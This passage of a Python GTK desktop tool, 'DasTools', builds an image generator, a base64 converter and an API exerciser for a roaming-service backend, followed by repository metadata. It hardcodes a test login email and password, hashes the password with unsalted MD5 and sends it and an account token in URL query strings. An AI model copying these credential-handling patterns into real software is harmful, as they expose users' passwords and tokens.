useful functionality from multiple tools\")\n\t\tself.set_border_width(20)\n\t\tself.set_default_size(800, 300)\n\n\t\thb = Gtk.HeaderBar()\n\t\thb.set_show_close_button(True)\n\t\thb.props.title = \"DasTools\"\n\t\tself.set_titlebar(hb)\n\n\t\tself.headerbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)\n\t\tGtk.StyleContext.add_class(self.headerbox.get_style_context(), \"linked\")\n\n\t\t# buttonleft = Gtk.Button()\n\t\t# buttonleft.add(Gtk.Arrow(Gtk.ArrowType.LEFT, Gtk.ShadowType.NONE))\n\t\t# self.headerbox.add(buttonleft)\n\n\t\t# buttonright = Gtk.Button()\n\t\t# buttonright.add(Gtk.Arrow(Gtk.ArrowType.RIGHT, Gtk.ShadowType.NONE))\n\t\t# self.headerbox.add(buttonright)\n\n\t\thb.pack_start(self.headerbox)\n\n\t\t# self.hbox = Gtk.Box(spacing=7)\n\t\t# start stack\n\n\t\tself.vbox = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=6)\n\t\tself.add(self.vbox)\n\n\t\tself.stack = Gtk.Stack()\n\t\tself.stack.set_transition_type(Gtk.StackTransitionType.SLIDE_LEFT_RIGHT)\n\t\tself.stack.set_transition_duration(1000)\n\n\n\n\n\t\tself.stack_switcher = Gtk.StackSwitcher()\n\t\tself.stack_switcher.set_stack(self.stack)\n\t\tself.vbox.pack_start(self.stack_switcher, True, True, 0)\n\t\tself.vbox.pack_start(self.stack, True, True, 0)\n\n\n\t\t# JuliusGenerator\n\t\tself.entry_width = Gtk.Entry()\n\t\tself.entry_width.set_placeholder_text(\"320\")\n\t\tself.entry_height = Gtk.Entry()\n\t\tself.entry_height.set_placeholder_text(\"480\")\n\t\tself.entry_displaytext = Gtk.Entry()\n\t\tself.entry_displaytext.set_placeholder_text(\"Lorem Ipsum\")\n\n\n\n\t\tself.button_generate = Gtk.Button(label=\"Generate image\")\n\t\tself.button_generate.connect(\"clicked\", self.on_button_generate_clicked)\n\n\t\tself.button_save = Gtk.Button(label=\"Save\")\n\t\tself.button_save.connect(\"clicked\", self.on_button_save_clicked)\n\n\t\tself.label_width = Gtk.Label(label=\"Width\", angle=0, halign=Gtk.Align.START)\n\t\tself.label_height = Gtk.Label(label=\"Height\", angle=0, halign=Gtk.Align.START)\n\t\tself.label_displaytext = Gtk.Label(label=\"Display Text\", angle=0, halign=Gtk.Align.START)\n\n\n\n\t\tjulius_file_name = \"julius_placeholder.jpg\"\n\t\tself.frame_placeholder = Gtk.Frame(label=\"Preview\")\n\t\tself.frame_placeholder.set_label_align(0.5, 0.5)\n\t\tself.frame_placeholder.set_shadow_type(Gtk.ShadowType.IN)\n\t\tself.image_placeholder = Gtk.Image.new_from_file(julius_file_name)\n\t\tself.frame_placeholder.add(self.image_placeholder)\n\n\n\n\n\t\ttable = Gtk.Table(2,5)\n\t\ttable.attach(self.label_width, 0, 1, 0, 1)\n\t\ttable.attach(self.entry_width, 1, 2, 0, 1)\n\t\ttable.attach(self.label_height, 0, 1, 1, 2)\n\t\ttable.attach(self.entry_height, 1, 2, 1, 2)\n\t\ttable.attach(self.label_displaytext, 0, 1, 2, 3)\n\t\ttable.attach(self.entry_displaytext, 1, 2, 2, 3)\n\t\ttable.attach(self.button_generate, 1, 2, 3, 4)\n\t\ttable.attach(self.button_save, 0, 1, 3, 4)\n\t\ttable.attach(self.frame_placeholder, 0, 2, 4, 5)\n\n\n\t\t# AugustusBase64Tools start\n\t\ttable_base64 = Gtk.Table(2, 5)\n\n\t\tself.label_base64_plaintext = Gtk.Label(label=\"Plaintext\", angle=0, halign=Gtk.Align.START)\n\t\ttable_base64.attach(self.label_base64_plaintext, 0, 1, 0, 1)\n\n\t\tself.entry_base64_plaintext = Gtk.Entry()\n\t\tself.entry_base64_plaintext.set_placeholder_text(\"Plaintext\")\n\t\ttable_base64.attach(self.entry_base64_plaintext, 1, 2, 0, 1)\n\n\t\tself.label_base64_ciphertext = Gtk.Label(label=\"Ciphertext\", angle=0, halign=Gtk.Align.START)\n\t\ttable_base64.attach(self.label_base64_ciphertext, 0, 1, 1, 2)\n\n\t\tself.entry_base64_ciphertext = Gtk.Entry()\n\t\tself.entry_base64_ciphertext.set_placeholder_text(\"Ciphertext\")\n\t\ttable_base64.attach(self.entry_base64_ciphertext, 1, 2, 1, 2)\n\n\t\tself.frame_base64_placeholder = Gtk.Frame(label=\"Preview\")\n\t\tself.frame_base64_placeholder.set_label_align(0.5, 0.5)\n\t\tself.frame_base64_placeholder.set_shadow_type(Gtk.ShadowType.IN)\n\t\tself.image_base64_placeholder = Gtk.Image.new_from_file('augustus_placeholder.png')\n\t\tself.frame_base64_placeholder.add(self.image_base64_placeholder)\n\n\n\t\ttable_base64.attach(self.frame_base64_placeholder, 0, 2, 4, 5)\n\n\t\tself.button_to_base64 = Gtk.Button(label=\"Convert to base64\")\n\t\tself.button_to_base64.connect(\"clicked\", self.on_button_to_base64_clicked)\n\n\t\tself.button_from_base64 = Gtk.Button(label=\"Convert from base64\")\n\t\tself.button_from_base64.connect(\"clicked\", self.on_button_from_base64_clicked)\n\n\t\ttable_base64.attach(self.button_from_base64, 1, 2, 3, 4)\n\t\ttable_base64.attach(self.button_to_base64, 0, 1, 3, 4)\n\n\t\t# AugustusBase64Tools end\n\n\n\t\t# AureliusTools start\n\n\t\ttable_aurelius = Gtk.Table(4, 21)\n\n\t\t##############################################################\n\t\t# Global Constants\n\t\t##############################################################\n\t\tself.ver = \"3\"\n\t\tself.vendorId = \"168118\"\n\t\tself.chipsetVendorId = \"2\"\n\t\tself.oemBrandingSelectorId = \"106\"\n\t\tself.appVersion = \"2.30.9\"\n\t\tself.phoneOS = \"Android%207.1.2\"\n\t\tself.phoneModel = \"BlackBerry%20BBD100-1\"\n\t\t##############################################################\n\t\t# BaseURL\n\t\t##############################################################\n\t\t# Label1\n\t\tself.label_aurelius_base_url = Gtk.Label(label=\"Select Environment : \", angle=0, halign=Gtk.Align.START)\n\t\ttable_aurelius.attach(self.label_aurelius_base_url, 0, 2, 0, 1)\n\n\t\t# Entry1\n\t\t# self.entry_aurelius_base_url = Gtk.Entry()\n\t\t# self.entry_aurelius_base_url.set_text(\"http://10.27.74.20:9000/API_Handler_release_live/?\")\n\t\t# table_aurelius.attach(self.entry_aurelius_base_url, 0, 2, 1, 2)\n\n\t\tenvironments = [\"https://app.knowroaming.com/API_Handler_release_live/?\", \"http://10.27.74.20:9000/API_Handler_release_live/?\"]\n\t\tself.environments_combo = Gtk.ComboBoxText()\n\t\t# self.environments_combo.set_entry_text_column(0)\n\t\tself.environments_combo.connect(\"changed\", self.on_environments_combo_changed)\n\t\tfor env in environments:\n\t\t\tself.environments_combo.append_text(env)\n\t\ttable_aurelius.attach(self.environments_combo, 0, 2, 1, 2)\n\n\n\t\tself.label_aurelius_base_url_confirm = Gtk.Label(label=\"Click to login : \", angle=0, halign=Gtk.Align.START)\n\t\ttable_aurelius.attach(self.label_aurelius_base_url_confirm, 2, 4, 0, 1)\n\n\t\t# Button12\n\t\tself.button_aurelius_do_login = Gtk.Button(label=\"Login\")\n\t\ttable_aurelius.attach(self.button_aurelius_do_login, 2, 4, 1, 2)\n\t\tself.button_aurelius_do_login.connect(\"clicked\", self.on_button_aurelius_do_login_clicked)\n\n\t\t##############################################################\n\t\t# Commands\n\t\t##############################################################\n\n\n\t\t# Label2\n\t\tself.label_aurelius_command = Gtk.Label(label=\"Command\", angle=0, halign=Gtk.Align.START)\n\t\ttable_aurelius.attach(self.label_aurelius_command, 0, 2, 2, 3)\n\n\t\tcommands = [\"checkAppVersion\", \\\n\t\t\t\t\t\"getBuyablePackages\", \\\n\t\t\t\t\t\"getAlcatelCountries_n\", \\\n\t\t\t\t\t\"getHistory_TODO\", \\\n\t\t\t\t\t\"getPrivateNews\", \\\n\t\t\t\t\t\"getPublicNews\", \\\n\t\t\t\t\t\"updatePushNotificationDeviceToken\", \\\n\t\t\t\t\t\"getCustomerInformation\"]\n\t\tself.commands_combo = Gtk.ComboBoxText()\n\t\t# self.environments_combo.set_entry_text_column(0)\n\t\tself.commands_combo.set_active(0)\n\t\tself.commands_combo.connect(\"changed\", self.on_commands_combo_changed)\n\t\tfor command in commands:\n\t\t\tself.commands_combo.append_text(command)\n\n\t\t# Entry2\n\t\t# self.entry_aurelius_two = Gtk.Entry()\n\t\t# self.entry_aurelius_two.set_placeholder_text(\"Command\")\n\t\ttable_aurelius.attach(self.commands_combo, 0, 2, 3, 4)\n\n\t\t# LabelRight\n\t\tself.label_aurelius_save_command_confirm = Gtk.Label(label=\"Click to execute command : \", angle=0, halign=Gtk.Align.START)\n\t\ttable_aurelius.attach(self.label_aurelius_save_command_confirm, 2, 4, 2, 3)\n\n\t\t# Button22\n\t\tself.button_aurelius_execute_command = Gtk.Button(label=\"Execute command\")\n\t\ttable_aurelius.attach(self.button_aurelius_execute_command, 2, 4, 3, 4)\n\t\tself.button_aurelius_execute_command.connect(\"clicked\", self.on_button_aurelius_execute_command_clicked)\n\n\t\t##############################################################\n\t\t# Email\n\t\t##############################################################\n\t\t# Label3\n\t\tself.label_aurelius_three = Gtk.Label(label=\"email\", angle=0, halign=Gtk.Align.START)\n\t\ttable_aurelius.attach(self.label_aurelius_three, 0, 2, 4, 5)\n\n\t\t# Entry3\n\t\tself.entry_aurelius_current_email = Gtk.Entry()\n\t\tself.entry_aurelius_current_email.set_text(\"blackberry01@knowroaming.com\")\n\t\ttable_aurelius.attach(self.entry_aurelius_current_email, 0, 2, 5, 6)\n\n\t\t# Button31\n\t\tself.button_aurelius_save_email = Gtk.Button(label=\"Save Email\")\n\t\ttable_aurelius.attach(self.button_aurelius_save_email, 2, 4, 4, 5)\n\t\tself.button_aurelius_save_email.connect(\"clicked\", self.on_button_aurelius_save_email_clicked)\n\n\t\t# Button32\n\t\tself.button_aurelius_saved_email = Gtk.Button(label=\"Saved Email : \")\n\t\ttable_aurelius.attach(self.button_aurelius_saved_email, 2, 4, 5, 6)\n\n\t\t##############################################################\n\t\t# Password\n\t\t##############################################################\n\t\t# Label4\n\t\tself.label_aurelius_four = Gtk.Label(label=\"password\", angle=0, halign=Gtk.Align.START)\n\t\ttable_aurelius.attach(self.label_aurelius_four, 0, 2, 6, 7)\n\n\t\t# Entry4\n\t\tself.entry_aurelius_four = Gtk.Entry()\n\t\tself.entry_aurelius_four.set_text(\"qwerty\")\n\t\ttable_aurelius.attach(self.entry_aurelius_four, 0, 2, 7, 8)\n\n\t\t# Button41\n\t\tself.button_aurelius_save_password = Gtk.Button(label=\"Save Password\")\n\t\ttable_aurelius.attach(self.button_aurelius_save_password, 2, 4, 6, 7)\n\n\t\t# Button41\n\t\tself.button_aurelius_saved_password = Gtk.Button(label=\"Saved Password : \")\n\t\ttable_aurelius.attach(self.button_aurelius_saved_password, 2, 4, 7, 8)\n\n\t\t##############################################################\n\t\t# Vendor\n\t\t##############################################################\n\n\t\tself.label_aurelius_vendor_select = Gtk.Label(label=\"Select Vendor : \", angle=0, halign=Gtk.Align.START)\n\t\ttable_aurelius.attach(self.label_aurelius_vendor_select, 0, 2, 8, 9)\n\n\t\tvendor_store = Gtk.ListStore(int, str)\n\t\tvendor_store.append([168011, \"ZTE\"])\n\t\tvendor_store.append([2, \"POP\"])\n\t\tvendor_store.append([168121, \"COOLPAD\"])\n\t\tvendor_store.append([168118, \"BLACKBERRY\"])\n\t\tself.vendor_combo = Gtk.ComboBox.new_with_model_and_entry(vendor_store)\n\t\tself.vendor_combo.connect(\"changed\", self.on_vendor_combo_changed)\n\t\tself.vendor_combo.set_entry_text_column(1)\n\t\tself.vendor_combo.set_active(0)\n\t\ttable_aurelius.attach(self.vendor_combo, 0, 2, 9, 10)\n\n\t\t##############################################################\n\t\t# Output\n\t\t##############################################################\n\t\t# AureliusPreview\n\t\t# self.frame_aurelius_placeholder = Gtk.Frame(label=\"Preview\")\n\t\t# self.frame_aurelius_placeholder.set_label_align(0.5, 0.5)\n\t\t# self.frame_aurelius_placeholder.set_shadow_type(Gtk.ShadowType.IN)\n\t\t# self.image_aurelius_placeholder = Gtk.Image.new_from_file('aurelius_placeholder.jpg')\n\t\t# self.frame_aurelius_placeholder.add(self.image_aurelius_placeholder)\n\t\t# table_aurelius.attach(self.frame_aurelius_placeholder, 0, 2, 11, 12)\n\n\t\t# aureliusTextViewOutput\n\t\tself.frame_aurelius_output_placeholder = Gtk.Frame(label=\"Output\")\n\t\tself.frame_aurelius_output_placeholder.set_label_align(0.5, 0.5)\n\t\tself.frame_aurelius_output_placeholder.set_shadow_type(Gtk.ShadowType.IN)\n\t\tself.textbuffer_output = Gtk.TextBuffer()\n\t\tself.textview_output = Gtk.TextView(buffer=self.textbuffer_output)\n\t\tself.textview_output.set_wrap_mode(Gtk.WrapMode.WORD)\n\n\t\tself.frame_aurelius_output_placeholder.add(self.textview_output)\n\t\ttable_aurelius.attach(self.frame_aurelius_output_placeholder, 0, 4, 16, 21)\n\n\t\t# JacksTools end\n\n\n\t\t# Continue stack\n\t\tself.resizer_button = Gtk.Button(label=\"AugustusBase64Tools\")\n\t\tself.stack.add_titled(table_base64, \"base64tools\", \"AugustusTools : Base64\")\n\t\tself.stack.add_titled(table, \"generator\", \"JuliusTools : Generator\")\n\t\tself.stack.add_titled(table_aurelius, \"aureliustools\", \"AureliusTools : Network Gym : API Exerciser\")\n\t##############################################################\n\tdef on_button_generate_clicked(self, widget):\n\t\twidth_value = self.entry_width.get_text()\n\t\twidth_value_int = int(width_value)\n\t\tprint('Width %s' % width_value )\n\t\theight_value = self.entry_height.get_text()\n\t\theight_value_int = int(height_value)\n\t\tprint('Height %s' % height_value)\n\t\tdisplaytext_value = self.entry_displaytext.get_text()\n\t\tprint(displaytext_value)\n\t\tfontname = 'FreeMono.ttf'\n\t\tfontsize = 20\n\n\t\tcolor_text = 'black'\n\t\tcolor_outline = 'red'\n\t\tcolor_background = 'transparent'\n\n\t\t# self.image_generated = Image.new('RGBA', (width_value_int, height_value_int), color_background)\n\t\tself.image_generated = Image.new('RGBA', (width_value_int, height_value_int))\n\t\tself.image_draw_generated = ImageDraw.Draw(self.image_generated)\n\t\tfont = ImageFont.truetype(fontname, fontsize)\n\t\tself.image_draw_generated.text((2, height_value_int/2), displaytext_value, fill=color_text, font=font)\n\t\tself.image_generated.save('image_generated_output.png')\n\n\t##############################################################\n\tdef on_button_save_clicked(self, widget):\n\t\tprint(\"Saving...\")\n\n\t##############################################################\n\tdef on_button_to_base64_clicked(self, widget):\n\t\tprint(\"To base64...\")\n\t\tplaintext_value = self.entry_base64_plaintext.get_text()\n\t\tprint(\"Plaintext:\")\n\t\tprint(plaintext_value)\n\t\tciphertext_value = base64.b64encode(bytes(plaintext_value, 'utf-8'))\n\t\tself.entry_base64_ciphertext.set_text(ciphertext_value)\n\t\tprint(ciphertext_value)\n\n\t##############################################################\n\tdef on_button_from_base64_clicked(self, widget):\n\t\tprint(\"From base64...\")\n\n\t##############################################################\n\tdef on_button_aurelius_save_base_url_clicked(self, widget):\n\t\t# base_url_value = self.entry_aurelius_base_url.get_text()\n\t\t# self.label_aurelius_base_url.set_text(\"BaseURL : \" + base_url_value)\n\t\t# self.textbuffer_output.set_text(\"Saved : \" + base_url_value)\n\t\tprint(\"on_button_aurelius_save_base_url_clicked\")\n\n\t##############################################################\n\tdef on_environments_combo_changed(self, combo):\n\t\tenvironments_entry_txt = combo.get_active_text()\n\t\tif environments_entry_txt != None:\n\t\t\tself.base_url_value = environments_entry_txt\n\t\t\tself.textbuffer_output.set_text(\"Changed... %s \" % environments_entry_txt)\n\n\t##############################################################\n\tdef on_commands_combo_changed(self, combo):\n\t\tcommands_entry_txt = combo.get_active_text()\n\t\tif commands_entry_txt != None:\n\t\t\tself.selected_command = commands_entry_txt\n\t\t\tself.button_aurelius_execute_command.set_label(\"Execute command : %s \" % commands_entry_txt)\n\t\t\tself.textbuffer_output.set_text(\"You are logged in as the following user : account_number : %s\" % self.account_number)\n\n\t##############################################################\n\tdef on_button_aurelius_do_login_clicked(self, widget):\n\t\t\tself.textbuffer_output.set_text(\"Login...\")\n\t\t\tlogin_value = self.entry_aurelius_current_email.get_text()\n\t\t\tself.selected_command = \"verifyLogin_n\"\n\t\t\t# password_value = self.entry_aurelius_four.get_text()\n\t\t\tself.hashed_password = hashlib.md5(self.entry_aurelius_four.get_text().encode('utf-8')).hexdigest()\n\t\t\tpassword_value = self.hashed_password\n\t\t\tself.current_request = self.base_url_value \\\n\t\t\t+ \"login=\" + login_value \\\n\t\t\t+ \"&password=\" + password_value \\\n\t\t\t+ \"&cmd=\" + self.selected_command \\\n\t\t\t+ \"&startTime=1499956971244&startingPosition=-2&intervalInDays=-1&phoneOS=iOS&phoneModel=iPad\";\n\t\t\tprint(\"Request \\n\" + self.current_request)\n\t\t\tresponse = urllib.request.urlopen(self.current_request)\n\t\t\tcharset_encoding = response.info().get_content_charset()\n\t\t\tcontent = response.read()\n\t\t\tjson_data = json.loads(content.decode(charset_encoding))\n\t\t\t# soup = BeautifulSoup(content.decode(charset_encoding))\n\t\t\tself.account_number = json_data['account_number']\n\t\t\tself.email = json_data['email']\n\t\t\tself.account_token = json_data['account_token']\n\n\t\t\t# self.textbuffer_output.set_text(\"Response ...account_number : %s\" % soup)\n\t\t\tself.textbuffer_output.set_text(\"You are logged in as the following user : account_number : %(1)s : email : %(2)s\" % {\"1\" : self.account_number, \"2\" : self.email})\n\t##############################################################\n\tdef on_button_aurelius_execute_command_clicked(self, widget):\n\t\t\tself.current_request = self.base_url_value + \"cmd=\" \\\n\t\t\t+ self.selected_command \\\n\t\t\t+ \"&account_number=\" \\\n\t\t\t+ self.account_number \\\n\t\t\t+ \"&account_token=\" \\\n\t\t\t+ self.account_token \\\n\t\t\t+ \"&ver=\" \\\n\t\t\t+ self.ver \\\n\t\t\t+ \"&vendorId=\" \\\n\t\t\t+ self.vendorId \\\n\t\t\t+ \"&chipsetVendorId=\" \\\n\t\t\t+ self.chipsetVendorId \\\n\t\t\t+ \"&oemBrandingSelectorId=\" \\\n\t\t\t+ self.oemBrandingSelectorId \\\n\t\t\t+ \"&appVersion=\" \\\n\t\t\t+ self.appVersion \\\n\t\t\t+ \"&phoneOS=\" \\\n\t\t\t+ self.phoneOS \\\n\t\t\t+ \"&phoneModel=\" \\\n\t\t\t+ self.phoneModel\n\t\t\tprint(\"Request \\n\" + self.current_request)\n\t\t\tresponse = urllib.request.urlopen(self.current_request)\n\t\t\tcharset_encoding = response.info().get_content_charset()\n\t\t\tcontent = response.read()\n\t\t\tjson_data = json.loads(content.decode(charset_encoding))\n\t\t\t# soup = BeautifulSoup(content.decode(charset_encoding))\n\t\t\tself.status = json_data['status']\n\t\t\tself.textbuffer_output.set_text(\"status : %s\" % self.status)\n\t\t\t# self.textbuffer_output.set_text(\"status : %s\" % soup)\n\t\t\t# self.textbuffer_output.set_text(\"status : %s\" % json_data)\n\n\t##############################################################\n\tdef on_button_aurelius_save_email_clicked(self, widget):\n\t\tself.button_aurelius_saved_email.set_label(self.entry_aurelius_current_email.get_text())\n\t\tprint(\"Saving \" + self.entry_aurelius_current_email.get_text())\n\t##############################################################\n\tdef on_vendor_combo_changed(self, combo):\n\t\ttree_iter = combo.get_active_iter()\n\t\tif tree_iter != None:\n\t\t\tmodel = combo.get_model()\n\t\t\trow_id, name = model[tree_iter][:2]\n\t\t\tprint(\"Selected: ID=%d, name=%s\" % (row_id, name))\n\t\t\tself.vendorId = str(row_id)\n\t##############################################################\nwin = DastoolsWindow()\nwin.connect(\"delete-event\", Gtk.main_quit)\nwin.show_all()\nGtk.main()\n", "repo_name": "arunabhdas/juliustools", "sub_path": "dastools/dastools.py", "file_name": "dastools.py", "file_ext": "py", "file_size_in_byte": 19093, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "gi.require_version", "line_number": 10, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.Window", "line_number": 24, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 24, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Window.__init__", "line_number": 27, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.Window", "line_number": 27, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 27, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.HeaderBar", "line_number": 31, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 31, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Box", "line_number": 36, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 36, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Orientation", "line_number": 36, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.StyleContext.add_class", "line_number": 37, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.StyleContext", "line_number": 37, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 37, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Box", "line_number": 52, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 52, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Orientation", "line_number": 52, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Stack", "line_number": 55, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 55, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.StackTransitionType", "line_number": 56, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 56, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.StackSwitcher", "line_number": 62, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 62, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 69, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 69, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 71, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 71, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 73, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 73, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 78, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 78, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 81, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 81, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 84, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 84, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Align", "line_number": 84, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 85, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 85, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Align", "line_number": 85, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 86, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 86, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Align", "line_number": 86, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Frame", "line_number": 91, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 91, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.ShadowType", "line_number": 93, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 93, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Image.new_from_file", "line_number": 94, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.Image", "line_number": 94, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 94, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Table", "line_number": 100, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 100, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Table", "line_number": 113, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 113, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 115, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 115, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Align", "line_number": 115, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 118, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 118, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 122, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 122, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Align", "line_number": 122, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 125, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 125, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Frame", "line_number": 129, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 129, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.ShadowType", "line_number": 131, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 131, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Image.new_from_file", "line_number": 132, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.Image", "line_number": 132, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 132, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 138, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 138, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 141, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 141, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Table", "line_number": 152, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 152, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 168, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 168, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Align", "line_number": 168, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.ComboBoxText", "line_number": 177, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 177, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 185, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 185, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Align", "line_number": 185, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 189, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 189, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 199, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 199, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Align", "line_number": 199, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.ComboBoxText", "line_number": 210, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 210, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 223, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 223, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Align", "line_number": 223, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 227, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 227, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 235, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 235, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Align", "line_number": 235, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 239, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 239, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 244, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 244, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 249, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 249, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 256, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 256, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Align", "line_number": 256, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 260, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 260, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 265, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 265, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 269, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 269, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 276, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 276, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Align", "line_number": 276, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.ListStore", "line_number": 279, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 279, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.ComboBox.new_with_model_and_entry", "line_number": 284, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.ComboBox", "line_number": 284, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 284, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Frame", "line_number": 302, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 302, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.ShadowType", "line_number": 304, "usage_type": 